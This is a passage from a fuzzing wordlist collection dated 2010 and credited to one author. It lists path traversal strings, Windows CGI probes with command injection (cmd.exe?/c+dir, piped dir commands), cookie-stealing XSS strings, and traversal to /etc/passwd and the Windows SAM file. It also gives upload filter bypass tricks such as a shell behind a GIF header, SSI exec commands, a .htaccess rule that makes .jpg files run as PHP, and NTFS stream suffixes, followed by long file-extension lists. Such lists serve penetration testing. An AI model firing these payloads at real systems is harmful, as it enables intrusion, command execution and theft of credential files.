.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010)<br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar <br />
# PHP on Windows<br />
{PHPSCRIPT}.php::$DATA<br />
</pre><br />
<br />
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar <br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{PREFIX}/templates_compiled/<br />
{PREFIX}/templates_c/<br />
{PREFIX}/templates/<br />
{PREFIX}/temporary/<br />
{PREFIX}/images/<br />
{PREFIX}/cache/<br />
{PREFIX}/temp/<br />
{PREFIX}/files/<br />
{PREFIX}/tmp/<br />
<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
